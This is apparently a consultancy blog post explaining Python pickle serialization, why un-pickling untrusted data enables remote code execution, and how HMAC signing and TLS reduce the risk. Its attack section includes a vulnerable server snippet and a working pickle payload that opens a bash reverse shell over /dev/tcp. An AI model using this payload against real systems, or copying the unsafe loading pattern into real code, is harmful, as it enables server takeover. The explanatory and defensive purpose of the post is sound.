Understanding Python pickling and how to use it securely

Post written by Ashutosh Agrawal, Senior Consultant and Arvind Balaji, Associate Consultant

Pickle in Python is primarily used for serializing and de-serializing a Python object structure. In other words, it is the process of converting a Python object into a byte stream in order to store it in a file or database, maintain program state across sessions, or transport data over the network. The pickled byte stream can be used to re-create the original object hierarchy by un-pickling the stream. This whole process is similar to object serialization in Java or .NET.
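As a minimal sketch of the round trip described above, the snippet below pickles a small dictionary and un-pickles it again. It assumes Python 3, where the plain pickle module uses the C implementation automatically; the sample data is hypothetical.

```python
import pickle

# Hypothetical sample data; any picklable object hierarchy would do.
state = {"user": "alice", "scores": [1, 2, 3], "active": True}

blob = pickle.dumps(state)      # object hierarchy -> byte stream
restored = pickle.loads(blob)   # byte stream -> new, equal object

print(type(blob).__name__)      # the stream is a bytes object
print(restored == state)        # same content
print(restored is state)        # but a separate object
```

The restored object compares equal to the original but is a distinct instance, which is what makes pickle usable for storage and transport.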

When a byte stream is un-pickled, the pickle module first creates an instance of the original object and then populates that instance with the correct data. The data specific to the original object instance is not sufficient on its own to do this. To un-pickle the object successfully, the pickled byte stream also contains instructions that tell the un-pickler how to reconstruct the original object structure, along with the instruction operands used to populate it.
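The instructions and operands mentioned above can be made visible with the standard pickletools module, which disassembles a pickle without executing it. This is only an illustrative sketch, assuming Python 3 and protocol 2; the tuple being pickled is an arbitrary example.

```python
import io
import pickle
import pickletools

# Arbitrary example object, pickled with protocol 2 for a short listing.
blob = pickle.dumps(("spam", 42), protocol=2)

out = io.StringIO()
pickletools.dis(blob, out=out)   # parses the opcodes only, runs nothing
listing = out.getvalue()
print(listing)
```

Each line of the listing is one instruction for the un-pickler (for example PROTO, TUPLE2, STOP), followed by its operand where it has one.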

According to the pickle module documentation, the following types can be pickled:

  • None, True, and False
  • Integers, long integers, floating point numbers, complex numbers
  • Normal and Unicode strings
  • Tuples, lists, sets, and dictionaries containing only picklable objects
  • Functions defined at the top level of a module
  • Built-in functions defined at the top level of a module
  • Classes that are defined at the top level of a module
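The list above can be checked with a small helper. The sketch below assumes Python 3; try_pickle is a hypothetical helper name, and json.dumps and collections.OrderedDict merely stand in for "a function and a class defined at the top level of a module".

```python
import collections
import json
import pickle

def try_pickle(obj):
    """Return True if obj can be pickled, False otherwise."""
    try:
        pickle.dumps(obj)
        return True
    except (pickle.PicklingError, AttributeError, TypeError):
        return False

results = {
    "None/True/False": try_pickle((None, True, False)),
    "numbers": try_pickle((1, 2.5, 3 + 4j)),
    "containers": try_pickle({"a": [1, 2], "b": {3, 4}, "c": (5,)}),
    "built-in function": try_pickle(len),
    "module-level function": try_pickle(json.dumps),
    "module-level class": try_pickle(collections.OrderedDict),
    "lambda": try_pickle(lambda x: x),   # not reachable by name
}

for label, ok in results.items():
    print(label, "->", "picklable" if ok else "not picklable")
```

Functions and classes are pickled by reference to their module and name, which is why a lambda, having no importable name, is rejected.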

Pickle allows different objects to declare how they should be pickled using the __reduce__ method. Whenever an object is pickled, the __reduce__ method it defines is called. This method returns either a string, which may represent the name of a Python global, or a tuple describing how to reconstruct the object when un-pickling.

Generally the tuple consists of two elements:

  • A callable (which in most cases would be the name of the class to call).
  • Arguments to be passed to the above callable.

The pickle library will pickle each component of the tuple separately, and will call the callable on the provided arguments to construct the new object during the process of un-pickling.
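To illustrate the (callable, arguments) tuple, here is a deliberately harmless sketch, assuming Python 3. The class name Recipe is hypothetical, and the built-in sorted is used in place of the class itself to show that the un-pickler calls whatever callable the tuple names.

```python
import pickle

class Recipe(object):
    """Hypothetical class whose pickle says: call sorted([3, 1, 2])."""

    def __reduce__(self):
        # (callable, args): the un-pickler will evaluate sorted([3, 1, 2])
        return (sorted, ([3, 1, 2],))

blob = pickle.dumps(Recipe())
result = pickle.loads(blob)

# The result is whatever the callable returned, not a Recipe instance.
print(type(result).__name__, result)
```

In ordinary use the callable would be the object's own class, so that un-pickling rebuilds an equivalent instance.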

Dangers in Pickle

Because the un-pickler calls whatever callable the byte stream names, and there is no effective way to verify a pickle stream before un-pickling it, an attacker can supply malicious shell code as input and cause remote code execution. The most common attack scenario is trusting raw pickle data received over the network. If the connection is unencrypted, the pickle could also have been modified on the wire. Another attack scenario is when an attacker can access and modify stored pickle files in caches, file systems, or databases.

The following example code demonstrates a simple client-server program. The server listens on a particular port and waits for a client to send data. Once it receives the data, it un-pickles it.

conn, addr = self.receiver_socket.accept()
data = conn.recv(1024)
# Unsafe: un-pickling calls whatever callable the received bytes name
return cPickle.loads(data)

If the client is not trusted, an attacker can get remote code to execute on the server and gain access to it.

import cPickle, os, socket

class Shell_code(object):
    def __reduce__(self):
        # On un-pickling, the server calls os.system() with this command
        return (os.system, ('/bin/bash -i >& /dev/tcp/"Client IP"/"Listening PORT" 0>&1',))

shell = cPickle.dumps(Shell_code())
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(('Server IP', 'Server PORT'))
client_socket.send(shell)
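A payload of this kind can be examined without running it. The sketch below, assuming Python 3, builds a pickle with a harmless placeholder command and disassembles it with pickletools, which only parses the stream; the class name Payload and the command string are hypothetical, and nothing is ever un-pickled.

```python
import io
import os
import pickle
import pickletools

class Payload(object):
    def __reduce__(self):
        # Harmless placeholder command; it is never executed in this sketch.
        return (os.system, ("echo pwned",))

blob = pickle.dumps(Payload(), protocol=2)

out = io.StringIO()
pickletools.dis(blob, out=out)   # parses opcodes only, calls nothing
listing = out.getvalue()
print(listing)
```

The listing shows a GLOBAL instruction naming the system function followed by REDUCE, the instruction that would call it on load. That is all an attacker needs the server to execute.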

Best Practices in Pickle

The pickle module is not inherently insecure. The following best practices allow safe implementation of pickle.

  • An untrusted client or an untrusted server can cause remote code execution. Thus pickle should never be used between unknown parties.
  • Ensure the parties exchanging pickle have an encrypted and authenticated network connection (for example, TLS). This prevents alteration or replay of data on the wire.
  • If having a secure connection is not possible, any alteration to the pickle can be detected by using a cryptographic signature. The pickle can be signed before storage or transmission, and its signature can be verified on the receiver side before loading it.
  • In scenarios where the pickle data is stored, review file system permissions and ensure protected access to the data.

The following example code demonstrates cryptographic signing and verification. The cryptographic signature, as mentioned above, helps in detecting any alteration of pickled data. The client uses HMAC to sign the data. It sends the digest value along with the pickled data to the server as shown below.

import hashlib, hmac, pickle

pickled_data = pickle.dumps(data)
# Keyed digest (HMAC-SHA1) over the pickled bytes
digest = hmac.new('shared-key', pickled_data, hashlib.sha1).hexdigest()
header = '%s' % (digest)
conn.send(header + ' ' + pickled_data)

The server receives the data, computes the digest, and compares it with the one that was sent. It un-pickles the data only if the two digests match.

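import hashlib, hmac, pickle

conn, addr = self.receiver_socket.accept()
data = conn.recv(1024)
# Split on the first space only; the pickled bytes may contain spaces
recvd_digest, pickled_data = data.split(' ', 1)
new_digest = hmac.new('shared-key', pickled_data, hashlib.sha1).hexdigest()
# Constant-time comparison (Python 2.7.7+); un-pickle only on a match
if not hmac.compare_digest(recvd_digest, new_digest):
    print 'Integrity check failed'
else:
    unpickled_data = pickle.loads(pickled_data)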
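For readers on Python 3, the same sign-then-verify idea can be sketched without sockets as follows. This is an illustration under stated assumptions, not the authors' code: the function names sign and verify_and_load are hypothetical, SHA-256 is swapped in for the SHA-1 used above, and 'shared-key' remains a placeholder for a real secret.

```python
import hashlib
import hmac
import pickle

SHARED_KEY = b"shared-key"   # placeholder from the article; use a real secret

def sign(obj, key=SHARED_KEY):
    """Return hex digest + b' ' + pickled bytes."""
    pickled = pickle.dumps(obj)
    digest = hmac.new(key, pickled, hashlib.sha256).hexdigest().encode("ascii")
    return digest + b" " + pickled

def verify_and_load(message, key=SHARED_KEY):
    """Un-pickle only if the HMAC matches; raise ValueError otherwise."""
    # The hex digest contains no spaces, so split on the first space only.
    recvd_digest, pickled = message.split(b" ", 1)
    expected = hmac.new(key, pickled, hashlib.sha256).hexdigest().encode("ascii")
    if not hmac.compare_digest(recvd_digest, expected):
        raise ValueError("Integrity check failed")
    return pickle.loads(pickled)

message = sign({"a": 1})
print(verify_and_load(message))

# Flip one bit of the payload: verification fails before anything is loaded.
tampered = message[:-1] + bytes([message[-1] ^ 1])
try:
    verify_and_load(tampered)
except ValueError as err:
    print(err)
```

The important design point is ordering: the digest is checked first, and pickle.loads is reached only when the check passes. A signature proves the data came from a holder of the key; it does not make a pickle from an untrusted key holder safe.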